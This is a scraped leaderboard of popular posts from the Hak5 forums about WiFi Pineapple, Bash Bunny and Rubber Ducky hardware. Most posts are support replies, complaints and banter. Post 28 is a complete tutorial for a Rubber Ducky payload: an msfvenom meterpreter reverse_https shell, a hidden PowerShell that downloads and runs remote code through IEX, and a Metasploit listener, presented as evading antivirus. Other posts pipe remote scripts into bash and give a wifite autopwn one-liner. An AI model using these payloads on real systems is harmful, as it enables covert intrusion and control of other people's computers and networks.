Leaderboard


Popular Content

Showing content with the highest reputation since 05/26/2017 in all areas

  1. 8 points
    Hi @RazerBlade, I'm sorry you are not satisfied with the WiFi Pineapple. I haven't been able to spend a lot of time on the WiFi Pineapple lately, because I was focusing on other Hak5 products. That's why you haven't seen any firmware or system module updates. In terms of bugs, I am aware that some exist, but you should know that only a small subset of our users experience them, which makes them hard to track down. Once I pick up the WiFi Pineapple again, I'm going to go over every Module (maybe one a week) and rid it of bugs and usability issues. I'll also be launching RCs to ensure that the shipped firmware upgrades are solid and "bug free(tm)". For now though, I'm truly sorry you are unhappy with the current state of the WiFi Pineapple. I hope that over the next few weeks and months we can remedy this.
  2. 6 points
    Wifi Pineapple - Themes
    Github: https://github.com/kbeflo/pineapple-themes
    Dark Theme Install: wget -qO- https://raw.githubusercontent.com/kbeflo/pineapple-themes/master/dark/install-dark.sh | bash
  3. 5 points
    Yup, that's it. I have it working but it's a bit slow. There are some tricks to speed it up though, so once I finish that, I'll push out a new firmware.
  4. 5 points
    Hey everyone, Recently I have seen a lot of questions in regards to installing tools on the Bash Bunny. This post will contain a list of .deb files published by Hak5. Please see our wiki for installation instructions. If you would like to suggest a tool to be published, please reply to this thread. All other posts will be removed.
    Impacket
    Responder
    Gohttp
    Disclaimer: Hak5 is not responsible for these tools. They are 3rd party packages and have not been checked for stability or security. Hak5 simply packages these tools for easy installation.
  5. 5 points
    Hey Everyone, As is likely apparent from the name, Buffalo Bulldozer is a rock solid release with the intent of synchronizing a stable base for both WiFi Pineapples in the 6th generation - the NANO and TETRA. We've implemented some major improvements to the Recon mode of the PineAP engine, both increasing accuracy as well as stability. Recon scans now gather both AP and Client information by default using only one radio. This change decreases wlan0 overhead, allowing for faster association responses and uninterrupted communication with connected clients. WPS detection has also been added to Recon, further adding to the at-a-glance visibility of the wireless landscape. Information gathering is also enhanced from the Recon view with each client's probe requests visible from their respective menus, meaning you'll be able to immediately identify targets without having to page over to logs. TETRA users will appreciate the enhanced 5GHz support in both Recon and PineAP for both scans and deauthentication. Under the hood the kernel has been updated, upstream wireless fixes have been applied and packages have been updated. We feel you'll find this release rock solid throughout and we're eager to hear your feedback. Please as always use the bug tracker from https://www.wifipineapple.com/bugs This major release paves the way for an upcoming "CC" version and its accompanying cloud infrastructure. We're excited to share these developments as the project progresses. Once again thank you all for your support. This is truly the best time to be a WiFi Pineappler and we're grateful for this community!
    -- Seb & Darren
    Changes can be found at https://www.wifipineapple.com/downloads#tetra.
  6. 4 points
    MANA-Toolkit! Pineapple NANO + TETRA. (IPK installation-files, and source-files ready to compile with OpenWRT-SDK) MANA Toolkit also includes a working version of SSLstrip2+dns2proxy for the Pineapples. (Which you cannot find anywhere else)
    Last update: 07.05.2017
    Changelog: Lots of small changes. The biggest being that the attack will now go into the background. And can be killed later again. Added a limit of 8 simultaneously active clients connected at a time, to not crash the device. This can be customized within: "hostapd-mana.conf" It could happen that this number needs to be reduced on the NANO. If you experience the NANO not responding, try lowering the number. SSLstrip2, SSLsplit, dns2proxy, crackapd, net-creds, firelamb and every part of the MANA-Toolkit comes with the package. (Even aslEAP)
    Install procedure:
    root@Pineapple:~# wget -qO- https://raw.githubusercontent.com/adde88/hostapd-mana/master/INSTALL.sh | bash -s -- -v -v
    How do I start MANA? Make sure you are not using wlan1 for anything. If you are, hostapd-mana will not be able to set the interface to 'master' mode. Type 'launch-mana' in the terminal to launch the attack. The attack will go silently into the background while at the same time giving output to the screen and log-files.
    root@Pineapple:~# launch-mana
    Type 'kill-mana' in the terminal to stop the attack.
    root@Pineapple:~# kill-mana
    Module: https://github.com/adde88/ManaToolkit
    I have released a pre-release version of the Mana Toolkit "Module" for the Pineapples. This lets you launch the attack from the Pineapples web-interface. General feedback or tips for improving the module are greatly appreciated!
    Github repo. + source-codes:
    https://github.com/adde88/hostapd-mana-openwrt
    https://github.com/adde88/hostapd-mana
    https://github.com/adde88/ManaToolkit (NEW BLEEDING-EDGE / DEV. BRANCH IS UP)
    The first repo. contains the IPK files you need to install everything, but it also contains the files you need to build it yourself with a proper SDK. The second repo. is used by the SDK. The SDK Makefile will download everything it needs from the github repo. to build the MANA-Toolkit package. You don’t need to touch the second repo. to get anything up and running. (OpenWRT-SDK handles this automatically.) The third repo. is the Mana Toolkit "Module", that needs testing and feedback from you guys. It also has a new dev-branch that contains my latest fresh changes, but it's not as stable as the master branch.
    Important directories:
    Config files: /etc/mana-toolkit/
    Log files: /pineapple/modules/ManaToolkit/log (This is the log-directory, even if you don't have the Module installed)
    You will find the usual MANA Tools at: /usr/share/mana-toolkit/
    OPKG Installation Files: (For those who want to install it manually)
    https://github.com/adde88/hostapd-mana-openwrt/raw/master/bin/ar71xx/packages/base/asleap_2.2-1_ar71xx.ipk
    https://github.com/adde88/hostapd-mana-openwrt/raw/master/bin/ar71xx/packages/base/hostapd-mana_2.6-3_ar71xx.ipk
    https://github.com/adde88/hostapd-mana-openwrt/raw/master/bin/ar71xx/packages/base/hostapd-mana_2.6-dev-3_ar71xx.ipk (dev. version - contains a new test-feature, that allows attacking specific targets only)
  7. 4 points
    Instead of hacking their system, maybe take the time to learn about it, if it is bluetooth, ask someone at the school. Brush up on your SE skills, talk to the system people that run the PA system, learn about it, and if it is bluetooth, ask them if you can test something, such as connecting to it. Then show them if you find a flaw. This whole "how do I hack my school" isn't so much black hat or white hat. It's how and what you do. If you act maliciously as in "I want to hack my school" without purpose, ie: malicious intent, then no, we don't condone that, but surely can't stop you. But if it's "I want to know how this system works and what I can do with it, can I test this theory xyz" and you're working with someone from staff or the school, then it's a different situation. As I say a lot, learning is not a crime. What you do may be, and that is on you. How you go about it, makes the world of difference. Tinkering and curiosity is how we learn. Just be responsible, and in all situations, cover your bases, because if some ass hat at school turns around and does it maliciously after you show them how it's done, you're the one going to get in trouble if you aren't going through the right channels and being up front about it. Hopefully they encourage you to learn about it in the process, vs getting yourself into trouble.
  8. 3 points
    I like that idea. I'll see what I can make happen.
  9. 3 points
    Did you happen to read this already? https://forums.hak5.org/index.php?/topic/28824-faq-frequently-asked-questions/ Or watch this one? https://youtu.be/NeDYD9nb7PM That came from this page: http://usbrubberducky.com/#!resources.md
  10. 3 points
  11. 3 points
    Cement.... cement your usb ports, all of them lol.
  12. 3 points
  13. 3 points
    We'll hopefully have more details on this later, and should have an official solution for this too. I don't think mounting the Bash Bunny to the WiFi Pineapple is the best way to handle communication, that's what CDC_ETHERNET is for. We can handle file transfers and C&C that way. The idea is that you'd be able to offload heavier tasks such as running mitmf, bettercap, poisontap, and more to the Bash Bunny, which requires a bit of fancy routing. Anyway, it's one of the next things on my list.
  14. 3 points
    About 6 to 8 months after 9/11, I was deployed to the giant sandbox. We made an overnight stop somewhere and went through a civilian airport to get back to the jets. Now these are military refuelers, which are also cargo planes. We had crates with our helmets, armor, and rifles onboard already. We fly in uniform, so most of us have pocket knives in our pockets and leatherman tools on our belts. The morons at the gates took our knives. Can't have us taking over the planes!! TSA and Homeland Security is a joke.
  15. 3 points
    There are also masks that can help. Especially when a vendor has a set default, like 8 numbers. And you have attacks like WPS Pins, and Pixie. Also tools like Wifiphisher. And sure it could take time, but I usually just start it before I go to bed, when I wake either I have the password or I don't. And even if I haven't captured the handshakes yet, I can still be generating tables overnight. I could be generating the times at home, while I'm out sniffing the handshake. With enough password modulation, you could get any password. The main thing is the time it takes to do it. I used to keep a list of the top 1000 ap passwords on my mk5. It would take about 30 seconds for the pineapple to go through them. Set up a dip switch for airmon-ng start wlan1 && wifite-ng -all -mac -strip -aircrack -dict 1000.txt -crack -i wlan1mon And suddenly you have a WiFi autopwn device. Flip the power switch, set it down, and wait for it to do its thing. It might not be very fast or work all the time, but I don't believe bruteforce is dead.
  16. 2 points
    I can almost certainly confirm that coptersafe is only adjusting fc parameters and not rooting the device. It also doesn't update the device as mentioned before.
  17. 2 points
    No, I am saying to choose one or the other, but only with one attack mode (ethernet OR storage; not both)
  18. 2 points
    I can try that as well when I get my rig set up. Probably be Monday.
  19. 2 points
    Ok. So I did some testing this morning and this is what I came up with (it has been hectic at work today so I haven't been able to post until now): This was using an Alfa AWUS036 and monitoring the output (from another device - Mikrotik) and also monitoring the power going to the Raspberry Pi 2.
    Here was my setup: My Pi, Mikrotik mAP and Alfa AWUS036.
    With antenna on - this was steady and remained the same through the duration (increasing txpower on antenna from 100mw to 1000mw). At 100mw. At 1000mw.
    So, just running the command 'ifconfig wlan0 down':
    Does turn off the Green LED on the device and monitor no longer registers.
    Input power is greatly reduced (this stayed like this until turning the interface back on).
    It really appears that using ifconfig (could be used in whatever shell scripts you are using / cron / etc.) actually cuts the power to the device or at least puts it into a very low power state. Hope these findings help you on your journey!
  20. 2 points
    Dbum successfully helped me fix this. Massive massive props to that guy!!! He told me to route del gw turtle.lan which allowed my kali to use the wifi as its main connection again... And then I just went ahead and ran the turtle.sh script and it worked! Thank you sir.
  21. 2 points
    I'll just leave this here...
  22. 2 points
    That's because arming mode doesn't start Ethernet. Once we have AUTO_ETHERNET working that will change.
  23. 2 points
    I can barely remember my own phone numbers...
  24. 2 points
    The WPNano traffic is being routed through his laptop which is running Bettercap. It's not on the WPNano itself.
  25. 2 points
    It should be the other way around. RNDIS is a windows specific protocol that has support in Linux (though if you look at the source files, you will find comments on how it's kind of hacky). ECM ethernet is the way to go on Linux operating systems. I have yet to see a full distribution that doesn't support ECM out of the box but supports RNDIS.
  26. 2 points
    Hello there! I recently purchased my WiFi Pineapple after purchasing the Bash Bunny and the Rubber Ducky because the tools were excellent and well maintained. I thought it would be this great seamless experience with the pineapple as the other Hak5 devices but I was wrong. To begin with, the device and its software is filled with bugs and the latest release was about 7 months ago! Of course the bugs may not break the device completely but it adds to a bad user experience where you realize you can't use a sdcard to install modules because of a kernel bug. Numerous bugs I have encountered are random shutdowns, recon stuck at 100%, pineap not starting or stopping and this is also present in many modules. This makes the device in a way useless because when you want to try to use it the bugs are always ruining the attack. Most of the bugs I have encountered are on the bugs tracker list and an ETA from Hak5 when the next firmware release would be highly appreciated! The problems may be hardware based but because they are already on the bug tracker list, I doubt it.
  27. 2 points
    Sorry - our policy is not to help or encourage the distribution of phishing pages, especially not if they are specific to social media or banking. You are welcome to ask questions regarding a captive portal, but I will lock this thread for now.
  28. 2 points
    Hello again friends! Today I will give a tutorial on how to create a payload that executes under 10 seconds and gives you a fully functioning meterpreter shell back to your kali linux machine. This is done under 20 lines of script. It's quite simple and works on any Windows machine with Powershell installed (Windows 7 and above comes preinstalled with this). I tested this first on my Windows 10 machine and works like a charm, fully undetected by antivirus since it writes the script to memory, not to the disk. Let's begin shall we? Step 1: Fire up Kali Linux and open a terminal. And using msfvenom we are going to create a shellcode. Enter this code: msfvenom -p windows/x64/meterpreter/reverse_https LHOST=XXX LPORT=XXX -f powershell > /root/Desktop/shellcode.txt The first part "msfvenom" indicates that we are using that specific tool. The -p parameter indicates what payload we are using. Change the "XXX" for the LHOST parameter to your Kali Linux machine, open a terminal and enter "ifconfig" if you are unsure. As for LPORT, you can use whatever you want. Typically you use 443, 8080, 4444. They all work. The -f parameter writes the shellcode in powershell format (obviously since we're using powershell). And the last part after the ">" indicates the location where this payload will be saved in. STEP 2: Now we are going to upload the shellcode to github or pastebin (whichever you prefer). Create a github account if you do not have one at https://github.com/join?source=header-home. After doing that, make a new repository on github and then upload the payload you just made (there are tutorials on google for uploading files). You can upload the file a couple different ways. The easiest is just log on github from your kali machine and upload from there. Or you can save the payload on a USB stick or somehow transfer it to your host machine and upload from there. Or if you use pastebin, upload to that! STEP 3: Now the fun part! Time to code the ducky. 
Copy and Paste my code and change the corresponding lines. DELAY 500 GUI x DELAY 1000 a DELAY 1000 ALT y DELAY 1000 STRING powershell -WindowStyle hidden ENTER DELAY 1000 STRING IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/CodeExecution/Invoke-Shellcode.ps1') ENTER DELAY 1000 STRING IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/GunZofPeace/PowerSploit/master/Scripts/Meterp') ENTER DELAY 1000 STRING Invoke-Shellcode -Shellcode ($buf) -Force ENTER What is going here in we are calling the windows + x button, then typing "a", which opens the CMD with admin privileges. Which is awesome for us. It then fires up the command to start up powershell, BUT IT OPENS IT UP HIDDEN. So the actual powershell window is hidden!!!!!!! The only way to see it is running is through Task Manager. Which is good for us :) After powershell is started up, it downloads the command "Invoke-Shellcode" and injects it into memory. Which doesn't do much by itself. You want to keep this line the same as mine! Copy and paste it exactly. Only for the first IEX string. Now, the second IEX string, you want replace the last link with whatever the link is to your script is on your github account. Remember the one you uploaded? You want to click on github, the button that says "Raw" and get that link! Then replace it between the two apostrophes. Lastly, the last line of code actually executes the payload and this is where you get your shell back on your listener. Or if you used pastebin, just place that link into the code. To set up the listener, open up a terminal in Kali. >msfconsole >use exploit/multi/handler >set payload windows/x64/meterpreter/reverse_https >set LHOST XXX (whatever IP you used, which would be your kali machine IP) >set LPORT XXX (whatever port you used) >exploit And there you go! Of course, have your listener before doing the attack. If you have any questions, please comment! 
This is my first actual tutorial, so feedback is wanted.
  29. 2 points
    Who...this is dark.. You meet some travelers.. They say hello.. Suddenly you're stuck on something You have reached, the deep web...
  30. 2 points
    I don't see a print-screen
  31. 2 points
    Get a lawyer. Find out if your rights were violated and they broke any laws or company policies. If the job is that important, be prepared to take it to court. Otherwise, start looking for a new job.
  32. 2 points
    Venting is understandable (to an extent), but without all the info and context (which should be directed to the shop, not the community forums), no one can help you (nor will we take sides here). Forums are not exactly here for shop support, and other than Seb once in a while fielding some to try and help (He's in Australia too, and not support for the shop) there isn't much we can do other than recommend you take a breather and wait for their response. Best we can tell you is send "one" email, wait, respond, and deal with it rationally. More emails you send, longer your wait in the queue. There are like 2 people that handle all the shop stuff. If you need to return it, then do so, they are generally good with returns, but we don't know what your problem is, and I gather neither does the shop at this point or things would be worked out. If it's help you need in getting the pineapple to work, or re-flashing, fixing something that is not working, etc, try the Pineapple section for help, but understand, the forums are NOT customer service.
  33. 2 points
    https://astr0baby.wordpress.com/2017/05/23/bashbunny-with-metasploit-ms17_010_eternalblue-vs-windows-7-sp1-x64/ going to try and setup msf this way and see if that will change anything.
  34. 2 points
    I thought I'd share this, my wife said to me you might as well order that bouncing bunny you're after! After some investigation we worked out she meant the bash bunny. Then this morning she asked me when my bunny boiler will arrive? I give up (lol)
  35. 2 points
    Good luck getting a *NIX machine to cough up creds with responder. This is mainly to be used against Windows devices that just love to share stuff. Unless you have some service set up to forward some cached creds, *nix will most likely prompt if it needs creds, not pass the local user creds. So on Windows, it pretending to be a 2GB network basically puts Windows into an authtrap where anything sent will ask for creds, for which Windows will cough up the current user's, usually, unless it is patched and the reg setting is set not to. Nix will ask you for creds to send unless it is creds you already put in and are still alive (you have them set to remember forever or while you are logged on instead of for a specific session). Even then it will only be for that url or unc, but the BB authTrap will respond to it, in which case it will get those hashed creds then.
  36. 2 points
    I do face occasional issues when using the GUI and it usually can be solved either by a power reset or factory reset. Sometimes Recon scan will hang at 100%, other times PineAP will not work as intended. Generally SSH into the device will offer a more reliable experience. Furthermore with the console mode you are able to debug what exactly is wrong. Also when you are facing too many issues it could be that the firmware wasn't updated properly, thus a firmware recovery might come in handy.
  37. 2 points
    Can't even delete modules now! Come on guys, step up to the mark, perhaps you should focus on getting the products you have already sold to customers in decent shape before turning your back on them to focus on bringing in more money with the next product. Alternatively, if you don't provide after sales support could you provide me with a product that's stable out of the box.
  38. 2 points
    Yep, my Nano is pretty useless to me right now with such erratic behaviour. Where is the product support? No updates provided in months and so unstable, 75% of my time is spent fault finding rather than playing with the product. Seems pretty worthless to me. When you consider it's sold as a tactical field device, it seems pretty ridiculous. How could this be used in the field when it's so unreliable? You would get home every time to find no data or it had locked up! I only bought it for experimenting at home, but it's just a nano doorstop right now. How a product can be sold like this with so many bugs and with no proactive work being provided to iron out these bugs is beyond me. Can someone recommend a stable firmware please. Alternatively, if as stated above only a small subset of your users experience bugs perhaps I could have my unit replaced with one that works in the same manner as the large subset who don't experience bugs!
  39. 2 points
    I have to agree that the vast majority of the time I have spent with my pineapples has been in troubleshooting, factory resetting, re-flashing, etc. The tool has great promise; but has never been stable for me in any true long term or feasible "deployment" sense. It has been fun to play with, while I'm not screaming at it for bugs I am fighting with; but I have never gotten any iteration to function in a consistent and stable way...and my first pineapple was a fon I built myself. So, I'm not talking about a passing fancy here. I've been involved with these things all the way up to the Mark V. Given my issues, and the fact that support for older models drops off very quickly, I just can't justify purchasing either of the newer models. Sad :(
  40. 2 points
    I love the products and I'm sure a lot of them were sold so maybe it's time to hire another developer to help you out. Yea my nano is also almost useless right now as well and I have the same issues :( You guys need to hire someone to work on each project, not ditch the main one (pineapple) that got you big because the rubber ducky got shown on Mr Robot. I understand you want to switch to rubber ducky while everyone's still talking about it but with as many people who bought this you need to hire some more people.
  41. 2 points
    In all honesty, you don't. You reset the password, and since it's your account you can do that with no issues.
  42. 2 points
    The best thing about that news article is that they took the time to detain him and press him for his phone's PIN, took 30 minutes grabbing all the data off of it, and then proceeded to NOT check his bags or person. I find that at least slightly evident of the fact that these exercises are not designed for 'our safety' against 'terrorists' at all, and are more aimed at eating away at our rights to privacy. George Orwell is spinning in his grave.
  43. 2 points
    Dunno about a War Rig :D but I pimped my old laptop with an Ono Sendai sticker. Now bring out your best ice breaker and simstim to kill that Blackice!! Ono what the hell!?? Google it! Highly addictive, ordering stickers online
  44. 2 points
    Try this on your Kali VM
    ifconfig eth1 172.16.42.42 netmask 255.255.255.0 up
    ping 172.16.42.1
    ^^ where eth1 == the interface of your NANO
    That won't setup Internet connection sharing, but it will show that your Kali box can get on the same network as the NANO.
  45. 1 point
  46. 1 point
    Check out this thread.
  47. 1 point
    The best way I have found to set up wp6.sh is using the manual option. In the above your HOST IP Address is not 172.16.42.42, it should be the IP address of the PC itself, everything else looks right. Kali Linux will set your pineapple as the active Internet connection when you plug it in, go to settings and network to change it back. For some reason Kali doesn't like to let 2 eth0 or eth1 both be on at the same time.
  48. 1 point
  49. 1 point
    No. He's connected to the wireless control ap the pineapple creates. Don't forget, that bank job was over a year ago.
  50. 1 point
    Hi @newbi3, I've been looking at the iptables rules to create a captive portal. Because the PineAP runs OpenWrt, there are some predefined rules that interfere with yours. So I've written a script that creates the iptables rules. https://pastebin.com/zZhzqf91
    ./portal.sh init -> will initialise the captive portal
    ./portal.sh purge -> remove all the rules, but keep OpenWrt ones
    ./portal.sh add/remove IP -> authorise a user
    HTTP (80) is successfully redirected to port 80 on the PineAP. HTTPS (443) is dropped and DNS is accepted (you can also redirect locally). I can't find a way to have HTTPS redirections to work without a certificate error or a protocol error if you redirect to port 80. Hope it helps :) (I fixed SSH and PineAP manager address, now it works)